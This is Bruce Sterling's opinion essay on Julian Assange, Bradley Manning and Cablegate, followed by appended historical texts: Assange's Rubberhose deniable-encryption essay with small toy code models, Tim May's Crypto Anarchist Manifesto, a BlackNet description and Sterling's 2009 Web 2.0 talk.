I don’t want to condone or condemn the acts of Bradley Manning. Because legions of people are gonna do that for me, until we’re all good and sick of it, and then some. I don’t have the heart to make this transgressor into some hockey-puck for an ideological struggle. I sit here and I gloomily contemplate his all-too-modern situation with a sense of Sartrean nausea. Commonly, the authorities don’t much like to crush apple-cheeked white-guy hackers like Bradley Manning. It’s hard to charge hackers with crimes, even when they gleefully commit them, because it’s hard to find prosecutors and judges willing to bone up on the drudgery of understanding what they did. But they’ve pretty much got to make a purée out of this guy, because of massive pressure from the gravely embarrassed authorities. Even though Bradley lacks the look and feel of any conventional criminal; wrong race, wrong zipcode, wrong set of motives. Bradley’s gonna become a “spy” whose “espionage” consisted of making the activities of a democratic government visible to its voting population. With the New York Times publishing the fruits of his misdeeds. Some set of American prosecutorial lawyers is confronting this crooked legal hairpin right now. I feel sorry for them.

Then there is Julian Assange, who is a pure-dye underground computer hacker. Julian doesn’t break into systems at the moment, but he’s not an “ex-hacker,” he’s the silver-plated real deal, the true avant-garde. Julian is a child of the underground hacker milieu, the digital-native as twenty-first century cypherpunk. As far as I can figure, Julian has never found any other line of work that bore any interest for him. Through dint of years of cunning effort, Assange has worked himself into a position where his “computer crimes” are mainly political. They’re probably not even crimes. They are “leaks.” Leaks are nothing special. They are tidbits from the powerful that every journalist gets on occasion, like crumbs of fishfood on the top of the media tank. Only, this time, thanks to Manning, Assange has brought in a massive truckload of media fishfood. It’s not just some titillating, scandalous, floating crumbs. There’s a quarter of a million of them. He’s become the one-man global McDonald’s of leaks. Ever the detail-freak, Assange in fact hasn’t shipped all the cables he received from Manning. Instead, he cunningly encrypted the cables and distributed them worldwide to thousands of fellow-travellers. This stunt sounds technically impressive, although it isn’t. It’s pretty easy to do, and nobody but a cypherpunk would think that it made any big difference to anybody. It’s part and parcel of Assange’s other characteristic activities, such as his inability to pack books inside a box while leaving any empty space. While others stare in awe at Assange’s many otherworldly aspects — his hairstyle, his neatness, too-precise speech, his post-national life out of a laptop bag — I can recognize him as pure triple-A outsider geek. Man, I know a thousand modern weirdos like that, and every single one of them seems to be on my Twitter stream screaming support for Assange because they can recognize him as a brother and a class ally. They are in holy awe of him because, for the first time, their mostly-imaginary and lastingly resentful underclass has landed a serious blow in a public arena. Julian Assange has hacked a superpower.

He didn’t just insult the captain of the global football team; he put spycams in the locker room. He has showed the striped-pants set without their pants. This is a massively embarrassing act of technical voyeurism. It’s like Monica and her stains and kneepads, only even more so. Now, I wish I could say that I feel some human pity for Julian Assange, in the way I do for the hapless, one-shot Bradley Manning, but I can’t possibly say that. Pity is not the right response, because Assange has carefully built this role for himself. He did it with all the minute concentration of some geek assembling a Rubik’s Cube. In that regard, one’s hat should be off to him. He’s had forty years to learn what he was doing. He’s not some miserabilist semi-captive like the uniformed Bradley Manning. He’s a darkside player out to stick it to the Man. The guy has surrounded himself with the cream of the computer underground, wily old rascals like Rop Gonggrijp and the fearsome Teutonic minions of the Chaos Computer Club. Assange has had many long, and no doubt insanely detailed, policy discussions with all his closest allies, about every aspect of his means, motives and opportunities. And he did what he did with fierce resolve. Furthermore, and not as any accident, Assange has managed to alienate everyone who knew him best. All his friends think he’s nuts. I’m not too thrilled to see that happen. That’s not a great sign in a consciousness-raising, power-to-the-people, radical political-leader type. Most successful dissidents have serious people skills and are way into revolutionary camaraderie and a charismatic sense of righteousness. They’re into kissing babies, waving bloody shirts, and keeping hope alive. Not this chilly, eldritch guy. He’s a bright, good-looking man who — let’s face it — can’t get next to women without provoking clumsy havoc and a bitter and lasting resentment. That’s half the human race that’s beyond his comprehension there, and I rather surmise that, from his stern point of view, it was sure to be all their fault. Assange was in prison for a while lately, and his best friend in the prison was his Mom. That seems rather typical of him. Obviously Julian knew he was going to prison; a child would know it. He’s been putting on his Solzhenitsyn clothes and combing his forelock for that role for ages now. I’m a little surprised that he didn’t have a more organized prison-support committee, because he’s a convicted computer criminal who’s been through this wringer before. Maybe he figures he’ll reap more glory if he’s martyred all alone.

I rather doubt the authorities are any happier to have him in prison. They pretty much gotta feed him into their legal wringer somehow, but a botched Assange show-trial could do colossal damage. There’s every likelihood that the guy could get off. He could walk into an American court and come out smelling of roses. It’s the kind of show-trial judo every repressive government fears. It’s not just about him and the burning urge to punish him; it’s about the public risks to the reputation of the USA. The superpower hypocrisy here is gonna be hard to bear. The USA loves to read other people’s diplomatic cables. They dote on doing it. If Assange had happened to out the cable-library of some outlaw pariah state, say, Paraguay or North Korea, the US State Department would be heaping lilies at his feet. They’d be a little upset about his violation of the strict proprieties, but they’d also take keen satisfaction in the hilarious comeuppance of minor powers that shouldn’t be messing with computers, unlike the grandiose, high-tech USA. Unfortunately for the US State Department, they clearly shouldn’t have been messing with computers, either. In setting up their SIPRnet, they were trying to grab the advantages of rapid, silo-free, networked communication while preserving the hierarchical proprieties of official confidentiality. That’s the real issue, that’s the big modern problem; national governments and global computer networks don’t mix any more. It’s like trying to eat a very private birthday cake while also distributing it. That scheme is just not working. And that failure has a face now, and that’s Julian Assange. Assange didn’t liberate the dreadful secrets of North Korea, not because the North Koreans lack computers, but because that isn’t a cheap and easy thing that half-a-dozen zealots can do. But the principle of it, the logic of doing it, is the same. Everybody wants everybody else’s national government to leak. Every state wants to see the diplomatic cables of every other state. It will bend heaven and earth to get them. It’s just, that sacred activity is not supposed to be privatized, or, worse yet, made into the no-profit, shareable, have-at-it fodder for a network society, as if global diplomacy were so many mp3s. Now the US State Department has walked down the thorny road to hell that was first paved by the music industry. Rock and roll, baby. Now, in strict point of fact, Assange didn’t blandly pirate the massive hoard of cables from the US State Department. Instead, he was busily “redacting” and minutely obeying the proprieties of his political cover in the major surviving paper dailies. Kind of a nifty feat of social-engineering there; but he’s like a poacher who machine-gunned a herd of wise old elephants and then went to the temple to assume the robes of a kosher butcher. That is a world-class hoax. Assange is no more a “journalist” than he is a crypto mathematician. He’s a darkside hacker who is a self-appointed, self-anointed, self-educated global dissident. He’s a one-man Polish Solidarity, waiting for the population to accrete around his stirring propaganda of the deed. And they are accreting; not all of ‘em, but, well, it doesn’t take all of them.

Julian Assange doesn’t want to be in power; he has no people skills at all, and nobody’s ever gonna make him President Vaclav Havel. He’s certainly not in for the money, because he wouldn’t know what to do with the cash; he lives out of a backpack, and his daily routine is probably sixteen hours online. He’s not gonna get better Google searches by spending more on his banned MasterCard. I don’t even think Assange is all that big on ego; I know authors and architects, so I’ve seen much worse than Julian in that regard. He’s just what he is; he’s something we don’t yet have words for. He’s a different, modern type of serious troublemaker. He’s certainly not a “terrorist,” because nobody is scared and no one got injured. He’s not a “spy,” because nobody spies by revealing the doings of a government to its own civil population. He is orthogonal. He’s asymmetrical. He panics people in power and he makes them look stupid. And I feel sorry for them. But sorrier for the rest of us. Julian Assange’s extremely weird version of dissident “living in truth” doesn’t bear much relationship to the way that public life has ever been arranged. It does, however, align very closely to what we’ve done to ourselves by inventing and spreading the Internet. If the Internet was walking around in public, it would look and act a lot like Julian Assange. The Internet is about his age, and it doesn’t have any more care for the delicacies of profit, propriety and hierarchy than he does. So Julian is heading for a modern legal netherworld, the slammer, the electronic parole cuff, whatever; you can bet there will be surveillance of some kind wherever he goes, to go along with the FREE ASSANGE stencils and xeroxed flyers that are gonna spring up in every coffee-bar, favela and university on the planet. A guy as personally hampered and sociopathic as Julian may in fact thrive in an inhuman situation like this. Unlike a lot of keyboard-hammering geeks, he’s a serious reader and a pretty good writer, with a jailhouse-lawyer facility for pointing out weaknesses in the logic of his opponents, and boy are they ever. Weak, that is. They are pathetically weak.

Diplomats have become weak in the way that musicians are weak. Musicians naturally want people to pay real money for music, but if you press them on it, they’ll sadly admit that they don’t buy any music themselves. Because, well, they’re in the business, so why should they? And the same goes for diplomats and discreet secrets. The one grand certainty about the consumers of Cablegate is that diplomats are gonna be reading those stolen cables. Not hackers: diplomats. Hackers bore easily, and they won’t be able to stand the discourse of intelligent trained professionals discussing real-life foreign affairs. American diplomats are gonna read those stolen cables, though, because they were supposed to read them anyway, even though they didn’t. Now, they’ve got to read them, with great care, because they might get blindsided otherwise by some wisecrack that they typed up years ago. And, of course, every intelligence agency and every diplomat from every non-American agency on Earth is gonna fire up computers and pore over those things. To see what American diplomacy really thought about them, or to see if they were ignored (which is worse), and to see how the grownups ran what was basically a foreign-service news agency that the rest of us were always forbidden to see. This stark fact makes them all into hackers. Yes, just like Julian. They’re all indebted to Julian for this grim thing that he did, and as they sit there hunched over their keyboards, drooling over their stolen goodies, they’re all, without exception, implicated in his doings. Assange is never gonna become a diplomat, but he’s arranged it so that diplomats henceforth are gonna be a whole lot more like Assange. They’ll behave just like him. They receive the goods just like he did, semi-surreptitiously. They may be wearing an ascot and striped pants, but they’ve got that hacker hunch in their necks and they’re staring into the glowing screen. And I don’t much like that situation. It doesn’t make me feel better. I feel sorry for them and what it does to their values, to their self-esteem. If there’s one single watchword, one central virtue, of the diplomatic life, it’s “discretion.” Not “transparency.” Diplomatic discretion. Discretion is why diplomats do not say transparent things to foreigners. When diplomats tell foreigners what they really think, war results. Diplomats are people who speak from nation to nation. They personify nations, and nations are brutal, savage, feral entities. Diplomats used to have something in the way of an international community, until the Americans decided to unilaterally abandon that in pursuit of Bradley Manning’s oil war. Now nations are so badly off that they can’t even get it together to coherently tackle heroin, hydrogen bombs, global warming and financial collapse. Not to mention the Internet. The world has lousy diplomacy now. It’s dysfunctional. The world corps diplomatique are weak, really weak, and the US diplomatic corps, which used to be the senior and best-engineered outfit there, is rattling around bottled-up in blast-proofed bunkers. It’s scary how weak and useless they are. US diplomats used to know what to do with dissidents in other nations. If they were communists they got briskly repressed, but if they had anything like a free-market outlook, then US diplomats had a whole arsenal of gentle and supportive measures; Radio Free Europe, publication in the West, awards, foreign travel, flattery, moral support; discreet things, in a word, but exceedingly useful things. 
Now they’re harassing Julian by turning those tools backwards. For a US diplomat, Assange is like some digitized nightmare-reversal of a kindly Cold War analog dissident. He read the dissident playbook and he downloaded it as a textfile; but, in fact, Julian doesn’t care about the USA. It’s just another obnoxious national entity. He happens to be more or less Australian, and he’s no great enemy of America. If he’d had the chance to leak Australian cables he would have leapt on that with the alacrity he did on Kenya. Of course, when Assange did that to meager little Kenya, all the grown-ups thought that was groovy; he had to hack a superpower in order to touch the third rail. But the American diplomatic corps, and all it thinks it represents, is just collateral damage between Assange and his goal. He aspires to his transparent crypto-utopia in the way George Bush aspired to imaginary weapons of mass destruction. And the American diplomatic corps are so many Iraqis in that crusade. They’re the civilian casualties.

As a novelist, you gotta like the deep and dark irony here. As somebody attempting to live on a troubled world… I dunno. It makes one want to call up the Red Cross and volunteer to fund planetary tranquilizers. I’ve met some American diplomats; not as many as I’ve met hackers, but a few. Like hackers, diplomats are very intelligent people; unlike hackers, they are not naturally sociopathic. Instead, they have to be trained that way in the national interest. I feel sorry for their plight. I can enter into the shame and bitterness that afflicts them now. The cables that Assange leaked have, to date, generally revealed rather eloquent, linguistically gifted American functionaries with a keen sensitivity to the feelings of aliens. So it’s no wonder they were of dwindling relevance and their political masters paid no attention to their counsels. You don’t have to be a citizen of this wracked and threadbare superpower — (you might, for instance, be from New Zealand) — in order to sense the pervasive melancholy of an empire in decline. There’s a House of Usher feeling there. Too many prematurely buried bodies. For diplomats, a massive computer leak is not the kind of sunlight that chases away corrupt misbehavior; it’s more like some dreadful shift in the planetary atmosphere that causes ultraviolet light to peel their skin away. They’re not gonna die from being sunburned in public without their pants on; Bill Clinton survived that ordeal, Silvio Berlusconi just survived it (again). No scandal lasts forever; people do get bored. Generally, you can just brazen it out and wait for the public to find a fresher outrage. Except. It’s the damage to the institutions that is spooky and disheartening; after the Lewinsky eruption, every American politician lives in permanent terror of a sex-outing. That’s “transparency,” too; it’s the kind of ghastly sex-transparency that Julian himself is stuck crotch-deep in. The politics of personal destruction hasn’t made the Americans into a frank and erotically cheerful people. On the contrary, the US today is like some creepy house of incest divided against itself in a civil cold war.

“Transparency” can have nasty aspects; obvious, yet denied; spoken, but spoken in whispers. Very Edgar Allan Poe. That’s our condition. It’s a comedy to those who think and a tragedy to those who feel, but it’s not a comedy that the planet’s general cultural situation is so clearly getting worse. As I sit here moping over Julian Assange, I’d love to pretend that this is just me in a personal bad mood; in the way that befuddled American pundits like to pretend that Julian is some kind of unique, demonic figure. He isn’t. If he ever was, he sure as hell isn’t now, as “Indoleaks,” “Balkanleaks” and “Brusselsleaks” spring up like so many filesharing whackamoles. Of course the Internet bedroom legions see him, admire him, and aspire to be like him — and they will. How could they not? Even though, as major political players go, Julian Assange seems remarkably deprived of sympathetic qualities. Most saintly leaders of the oppressed masses, most wannabe martyrs, are all keen to kiss-up to the public. But not our Julian; clearly, he doesn’t lack for lust and burning resentment, but that kind of gregarious, sweaty political tactility is beneath his dignity. He’s extremely intelligent, but, as a political, social and moral actor, he’s the kind of guy who gets depressed by the happiness of the stupid. I don’t say these cruel things about Julian Assange because I feel distant from him, but, on the contrary, because I feel close to him. I don’t doubt the two of us would have a lot to talk about. I know hordes of men like him; it’s just that they are programmers, mathematicians, potheads and science fiction fans instead of fiercely committed guys who aspire to topple the international order and replace it with subversive wikipedians.


Enigma machines were used by the Nazis in WWII (unsuccessfully) to ensure world domination.

The chances of that ending well are about ten thousand to one. And I don’t doubt Assange knows that. This is the kind of guy who once wrote an encryption program called “Rubberhose,” because he had it figured that the cops would beat his password out of him, and he needed some code-based way to finesse his own human frailty. Hey, neat hack there, pal. So, well, that’s the general situation with this particular scandal. I could go on about it, but I’m trying to pace myself. This knotty situation is not gonna “blow over,” because it’s been building since 1993 and maybe even 1947. “Transparency” and “discretion” are virtues, but they are virtues that clash. The international order and the global Internet are not best pals. They never were, and now that’s obvious. The data held by states is gonna get easier to steal, not harder to steal; the Chinese are all over Indian computers, the Indians are all over Pakistani computers, and the Russian cybermafia is brazenly hosting wikileaks.info because that’s where the underground goes to the mattresses. It is a godawful mess. This is gonna get worse before it gets better, and it’s gonna get worse for a long time. Like leaks in a house where the pipes froze. Well, every once in a while, a situation that’s one-in-a-thousand is met by a guy who is one in a million. It may be that Assange is, somehow, up to this situation. Maybe he’s gonna grow in stature by the massive trouble he has caused. Saints, martyrs, dissidents and freaks are always wild-cards, but sometimes they’re the only ones who can clear the general air. Sometimes they become the catalyst for historical events that somehow had to happen. They don’t have to be nice guys; that’s not the point. Julian Assange did this; he direly wanted it to happen. He planned it in nitpicky, obsessive detail. Here it is; a planetary hack. I don’t have a lot of cheery hope to offer about his all-too-compelling gesture, but I dare to hope he’s everything he thinks he is, and much, much, more.

CONTACT
Bruce Sterling
http://www.wired.com/beyond_the_beyond/
email : bruces [at] well [dot] com

RUBBER HOSE CRYPTO
http://en.wikipedia.org/wiki/Rubber_hose_cryptanalysis
http://iq.org/~proff/rubberhose.org/current/src/doc/sergienko.html
http://iq.org/~proff/rubberhose.org/current/src/SECURITY
http://iq.org/~proff/rubberhose.org/current/src/doc/beatings.txt
by Julian Assange

Rubberhose was originally conceived by crypto-programmer Julian Assange as a tool for human rights workers who needed to protect sensitive data in the field, particularly lists of activists and details of incidents of abuse. Repressive regimes in places like East Timor, Russia, Kosovo, Guatemala, Iraq, Sudan and The Congo conduct human rights abuses regularly. Our team has met with human rights groups and heard first-hand accounts of such abuses. Human rights workers carry vital data on laptops through the most dangerous situations, sometimes being stopped by military patrols who would have no hesitation in torturing a suspect until he or she revealed a passphrase to unlock the data. We want to help these sorts of campaigners, particularly the brave people in the field who risk so much to smuggle data about the abuses out to the rest of the world.

Rubberhose (our rubber-hose proof filing system) addresses most of these technical issues, but I’d like to just comment on the best strategy, game-theory-wise, for the person wielding the rubber hose. In Rubberhose the number of encrypted aspects (deniable “virtual” partitions) defaults to 16 (although it is theoretically unlimited). As soon as you have over 4 pass-phrases, the excuse “I can’t recall” or “there’s nothing else there” starts to sound highly plausible. Ordinarily, the best strategy for the rubber-hose wielder is to keep on beating keys out of (let us say, Alice) indefinitely till there are no keys left. However, and importantly, in Rubberhose, *Alice* can never prove that she has handed over the last key. As Alice hands over more and more keys, her attackers can make observations like “the keys Alice has divulged correspond to 85% of the bits”. However at no point can her attackers prove that the remaining 15% don’t simply pertain to unallocated space, and at no point can Alice, even if she wants to, divulge keys to 100% of the bits, in order to bring the un-divulged portion down to 0%. An obvious point to make here is that fraction-of-total-data divulged is essentially meaningless, and both parties know it – the launch code aspect may only take up .01% of the total bit-space. What I find interesting is how this constraint on Alice’s behaviour actually protects her from revealing her own keys, because each party, at the outset, can make the following observations:

Rubber-hose-squad:
We will never be able to show that Alice has revealed the last of her keys. Further, even if Alice has co-operated fully and has revealed all of her keys, she will not be able to prove it. Therefore, we must assume, at every stage, that Alice has kept secret information from us, and continue to beat her, even though she may have revealed the last of her keys. But the whole time we will feel uneasy about this because Alice may have co-operated fully. Alice will have realised this though, and so presumably it’s going to be very hard to get keys out of her at all.

Alice:
(Having realised the above) I can never prove that I have revealed the last of my keys. In the end I’m bound for continued beating, even if I can buy brief respites by coughing up keys from time to time. Therefore, it would be foolish to divulge my most sensitive keys, because (a) I’ll be that much closer to the stage where I have nothing left to divulge at all (it’s interesting to note that this seemingly illogical, yet entirely valid argument of Alice’s can protect the most sensitive of Alice’s keys the “whole way through”, like a form of mathematical induction), and (b) the taste of truly secret information will only serve to make my aggressors come to the view that there is even higher quality information yet to come, redoubling their beating efforts to get at it, even if I have revealed all. Therefore, my best strategy would be to (a) reveal no keys at all or (b) depending on the nature of the aggressors, and the psychology of the situation, very slowly reveal my “duress” and other low-sensitivity keys. Alice certainly isn’t in for a very nice time of it (although she’s far more likely to protect her data).
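
{{ A toy model, added editorially, of the examiner’s predicament described above. The block layout and numbers here are invented, and this is not Rubberhose’s actual on-disk format: the point is simply that every block looks random, so once Alice has divulged some keys, nothing distinguishes a further hidden aspect from unallocated fill. }}

#include <stdio.h>
#include <stdlib.h>

#define BLOCKS 100

int main(void)
{
    /* owner[i]: which aspect block i belongs to; 0 means random fill.
       Only Alice knows this map -- on disk, every block looks alike. */
    int owner[BLOCKS];
    int secret_aspects = 3;                  /* Alice's secret */
    srand(42);
    for (int i = 0; i < BLOCKS; i++)
        owner[i] = rand() % (secret_aspects + 1);

    /* Alice divulges the keys to aspects 1 and 2 only. */
    int revealed = 0;
    for (int i = 0; i < BLOCKS; i++)
        if (owner[i] == 1 || owner[i] == 2)
            revealed++;

    printf("examiner can now decrypt %d%% of the bits;\n",
           revealed * 100 / BLOCKS);
    printf("the remaining %d%% look the same whether they hide a third\n",
           (BLOCKS - revealed) * 100 / BLOCKS);
    printf("aspect or are unallocated fill.\n");
    return 0;
}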

On the individual level, you would have to question whether you might want to be able to prove that, yes, in fact you really have surrendered the last remaining key, at the cost of a far greater likelihood that you will. It really depends on the nature of your opponents. Are they intelligent enough to understand the deniable aspect of the cryptosystem and come up with the above strategy? Determined to the extent that they are willing to invest the time and effort in wresting the last key out of you? Ruthless – do they say “Please”, hand you a Court Order, or is it more of a Room 101 affair? But there’s more to the story. Organisations and groups may have quite different strategic goals in terms of key retention vs torture relief to the individuals that comprise them, even if their views are otherwise co-aligned. A simple democratic union of two or more people will exhibit this behaviour. When a member of a group who uses conventional cryptography to protect group secrets is rubber-hosed, they have two choices: (1) defecting (by divulging keys) in order to save themselves, at the cost of selling the other individuals in the group down the river, or (2) staying loyal, protecting the group and in the process subjugating themselves to continued torture. With Rubberhose-style deniable cryptography, the benefits to a group member from choosing tactic 1 (defection) are subdued, because they will never be able to convince their interrogators that they have defected. Rational individuals that are “otherwise loyal” to the group will realise the minimal gains to be made in choosing defection and choose tactic 2 (loyalty) instead. Presumably most people in the group do not want to be forced to give up their ability to choose defection. On the other hand, no one in the group wants anyone (other than themselves) in the group to be given the option of defecting against the group (and thus the person making the observation). Provided no individual is certain* they are to be rubber-hosed, every individual will support the adoption of a group-wide Rubberhose-style cryptographically deniable crypto-system. This property is communitive, while the individual’s desire to be able to choose defection is not. The former every group member wants for every other group member, but not themselves. The latter each group member wants only for themself.

* “certain” is a little misleading. Each individual has a threshold which is proportional not only to the perceived likelihood of being rubber-hosed, weighed against one’s dislike of it, but also takes in the number of individuals in the group, the damage caused by a typical defection to the other members of the group, etc.

Cheers, Julian
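
NOTE: Alice’s reasoning above is, at bottom, an expected-payoff calculation. Here is a toy sketch of it in TypeScript, with purely illustrative numbers; nothing in it comes from Rubberhose itself.

  // pProve: probability the victim can convince interrogators that the
  // keys handed over really are the last ones.
  function expectedBeating(defects: boolean, pProve: number): number {
    const ongoing = 10; // cost of continued rubber-hosing (arbitrary units)
    const relief = 0;   // cost once interrogators believe nothing is left
    if (!defects) return ongoing;
    // Defection only pays off if it can be proven complete.
    return pProve * relief + (1 - pProve) * ongoing;
  }

  // Conventional crypto: surrendering the key is self-evidently complete,
  // so pProve is near 1 and defection buys relief.
  console.log(expectedBeating(true, 1.0)); // 0: defection pays
  // Deniable crypto: the last key can never be shown to be the last,
  // so pProve is near 0 and defection gains nothing over loyalty.
  console.log(expectedBeating(true, 0.0)); // 10: same cost as loyalty

In the deniable case the two tactics cost the same, which is exactly why the rational member stays loyal and why the group as a whole wants the system adopted.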

the CRYPTO-ANARCHIST MANIFESTO
http://en.wikipedia.org/wiki/Crypto-anarchism
http://www.activism.net/cypherpunk/crypto-anarchy.html
From: tcmay@netcom.com (Timothy C. May)
Subject: The Crypto Anarchist Manifesto
Date: Sun, 22 Nov 92

Cypherpunks of the World,
Several of you at the “physical Cypherpunks” gathering yesterday in Silicon Valley requested that more of the material passed out in meetings be available electronically to the entire readership of the Cypherpunks list, spooks, eavesdroppers, and all. Here’s the “Crypto Anarchist Manifesto” I read at the September 1992 founding meeting. It dates back to mid-1988 and was distributed to some like-minded techno-anarchists at the “Crypto ’88” conference and then again at the “Hackers Conference” that year. I later gave talks at Hackers on this in 1989 and 1990. There are a few things I’d change, but for historical reasons I’ll just leave it as is. Some of the terms may be unfamiliar to you…I hope the Crypto Glossary I just distributed will help. (This should explain all those cryptic terms in my .signature!) –Tim May

……………………………………………

The Crypto Anarchist Manifesto
by Timothy C. May

A specter is haunting the modern world, the specter of crypto anarchy. Computer technology is on the verge of providing the ability for individuals and groups to communicate and interact with each other in a totally anonymous manner. Two persons may exchange messages, conduct business, and negotiate electronic contracts without ever knowing the True Name, or legal identity, of the other. Interactions over networks will be untraceable, via extensive re-routing of encrypted packets and tamper-proof boxes which implement cryptographic protocols with nearly perfect assurance against any tampering. Reputations will be of central importance, far more important in dealings than even the credit ratings of today. These developments will alter completely the nature of government regulation, the ability to tax and control economic interactions, the ability to keep information secret, and will even alter the nature of trust and reputation.

The technology for this revolution–and it surely will be both a social and economic revolution–has existed in theory for the past decade. The methods are based upon public-key encryption, zero-knowledge interactive proof systems, and various software protocols for interaction, authentication, and verification. The focus has until now been on academic conferences in Europe and the U.S., conferences monitored closely by the National Security Agency. But only recently have computer networks and personal computers attained sufficient speed to make the ideas practically realizable. And the next ten years will bring enough additional speed to make the ideas economically feasible and essentially unstoppable. High-speed networks, ISDN, tamper-proof boxes, smart cards, satellites, Ku-band transmitters, multi-MIPS personal computers, and encryption chips now under development will be some of the enabling technologies.

The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be traded freely and will allow illicit and stolen materials to be traded. An anonymous computerized market will even make possible abhorrent markets for assassinations and extortion. Various criminal and foreign elements will be active users of CryptoNet. But this will not halt the spread of crypto anarchy.

Just as the technology of printing altered and reduced the power of medieval guilds and the social power structure, so too will cryptologic methods fundamentally alter the nature of corporations and of government interference in economic transactions. Combined with emerging information markets, crypto anarchy will create a liquid market for any and all material which can be put into words and pictures. And just as a seemingly minor invention like barbed wire made possible the fencing-off of vast ranches and farms, thus altering forever the concepts of land and property rights in the frontier West, so too will the seemingly minor discovery out of an arcane branch of mathematics come to be the wire clippers which dismantle the barbed wire around intellectual property. Arise, you have nothing to lose but your barbed wire fences!

………………………………………………………………..

Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay@netcom.com | anonymous networks, digital pseudonyms, zero
408-688-5409 | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
Higher Power: 2^756839 | PGP Public Key: by arrangement.

BLACKNET
http://www.kk.org/outofcontrol/ch12-a.html
http://www.cypherpunks.to/faq/cyphernomicron/cyphernomicon.txt

“What is BlackNet?”
“— an experiment in information markets, using anonymous message pools for exchange of instructions and items. Tim May’s experiment in guerilla ontology.
— an experimental scheme devised by T. May to underscore the nature of anonymous information markets. “Any and all” secrets can be offered for sale via anonymous mailers and message pools. The experiment was leaked via remailer to the Cypherpunks list (not by May) and thence to several dozen Usenet groups by Detweiler. The authorities are said to be investigating it.”

SOME CONTEXT : the BRIEF but GLORIOUS LIFE of WEB 2.0, and WHAT COMES AFTER
http://www.wired.com/beyond_the_beyond/2009/03/what-bruce-ster/
What Bruce Sterling Actually Said About Web 2.0 at Webstock 09
by Bruce Sterling  / March 1, 2009

{By the garbled reportage, I’d be guessing some of those kiwis were having trouble with my accent. Here are the verbatim remarks.}

So, thanks for having me cross half the planet to be here. So, just before I left Italy, I was reading an art book. About 1902, because we futurists do that. And it had this comment in it by Walter Pater that reminded me of your problems. Walter Pater was a critic and an artist of Art Nouveau. There was a burst of Art Nouveau in Turin in 1902 — because what Arts and Crafts always needed was some rich industrialists. Rich factory owners were the guys who bought those elaborate handmade homes and the romantic paintings of the Lady of Shalott. Fantastic anti-industrial structures were financed by heavy industry.

I know that sounds ironic or even sarcastic, but it isn’t. Creative energies are liberated by oxymorons, by breakdowns in definitions. The Muse comes out when you look sidelong, over your shoulder. So Walter Pater was a critic, like me, so of course he’s complaining. The Italians in 1902 don’t understand the original doctrines of the PreRaphaelites and Ruskin and William Morris! That’s his beef. The Italians just think that Art Nouveau has a lot of curvy lines in it, and it’s got something to do with nude women and vegetables! They’re just seizing on the superficial appearances! In Italy they call that stuff “Flower Style.”

And that’s your problem, too, here in New Zealand. Far from the action here at the antipodes, you people, you just don’t get it about the original principles of Web 2.0! Too often, you’ve got no architecture of participation, sometimes you don’t have an open API! Out here at the end of the earth, you think it’s all about drop shadows and the gradients and a tag cloud, and a startup name with a Capital R in the middle of it!

And that’s absolutely the way of the world… nothing any critic can do about it. People do make mistakes, they interpret things wrongly — but more to the point, they DELIBERATELY make mistakes in creative work. Creative people don’t want to “do it right.” They want to share the excitement you had when you yourself didn’t know how to do it right. Creative people are unconsciously attracted by the parts that make no sense. And Web 2.0 was full of those.

I want you to know that I respect Web 2.0. I sincerely think it was a great success. Art Nouveau was not a success — it had basic concepts that were seriously wrongheaded. Whereas Web 2.0 had useful, sound ideas that were creatively vague. It also had things in it that pretended to be ideas, but were not ideas at all: they were attitudes. In web critical thinking, this effort, Web 2.0, was where it was at. Web 2.0 has lost its novelty value now, but it’s not dead. It’s been realized: it has spread worldwide.

It’s Web 1.0 that is dead. Web 1.0 was comprehensively crushed by Web 2.0; Web 2.0 fell flaming on top of it and smashed it to rubble.

Web 2.0 is Wikipedia, while web 1.0 is Britannica Online. “What? Is Britannica online? Why?”

Web 2.0 is FlickR, while web 1.0 is Ofoto. “Ofoto? I’ve never even heard of Ofoto.”

Web 2.0 is search engines and Web 1.0 is portals. “Yeah man, I really need a New Zealand portal! I don’t think I can handle that information superhighway without a local portal!”

What do we talk about when we say “Web 2.0?” Luckily, we have a canonical definition! Straight from the originator! Mr Tim O’Reilly! Publisher, theorist, organizer, California tech guru: “Web 2.0 is the network as platform, spanning all connected devices; Web 2.0 applications are those that make the most of the intrinsic advantages of that platform: delivering software as a continually-updated service that gets better the more people use it, consuming and remixing data from multiple sources, including individual users, while providing their own data and services in a form that allows remixing by others, creating network effects through an ‘architecture of participation,’ and going beyond the page metaphor of Web 1.0 to deliver rich user experiences.”

I got all interested when I heard friends discussing web 2.0, so I swiftly went and read that definition. After reading it a few times, I understood it, too. But — okay, is that even a sentence? A sentence is a verbal construction meant to express a complete thought. This congelation that Tim O’Reilly constructed, that is not a complete thought. It’s a network in permanent beta. We might try to diagram that sentence. Luckily Tim did that for us already. Here it is.

The nifty-keen thing here is that Web 2.0 is a web. It’s a web of bubbles and squares. A glorious thing — but that is not a verbal argument. That’s like a Chinese restaurant menu. You can take one bubble from sector A, and two from sector B, and three from sector C, and you are Web 2.0. Feed yourself and your family! Take away all the bubbles, and put some people there instead. Web 2.0 becomes a Tim O’Reilly conference. This guy is doing x, and that guy is doing y, and that woman is the maven of doing z. Do these people want to talk to each other? Do they have anything to say and share? You bet they do. Throw in some catering and scenery, and it’s very Webstock.

Web 2.0 theory is a web. It’s not philosophy, it’s not ideology like a political platform, it’s not even a set of esthetic tenets like an art movement. The diagram for Web 2.0 is a little model network. You can mash up all the bubbles to the other bubbles. They carry out subroutines on one another. You can flowchart it if you want. There’s a native genius here. I truly admire it. This chart is five years old now, which is 35 years old in Internet years, but intellectually speaking, it’s still new in the world. It’s alarming how hard it is to say anything constructive about this from any previous cultural framework.

The things that are particularly stimulating and exciting about Web 2.0 are the bits that are just flat-out contradictions in terms. Those are my personal favorites, the utter violations of previous common sense: the frank oxymorons. Like “the web as platform.” That’s the key Web 2.0 insight: “the web as a platform.” Okay, “webs” are not “platforms.” I know you’re used to that idea after five years, but consider taking the word “web” out, and using the newer sexy term, “cloud.” “The cloud as platform.” That is insanely great. Right? You can’t build a “platform” on a “cloud!” That is a wildly mixed metaphor! A cloud is insubstantial, while a platform is a solid foundation! The platform falls through the cloud and is smashed to earth like a plummeting stock price!

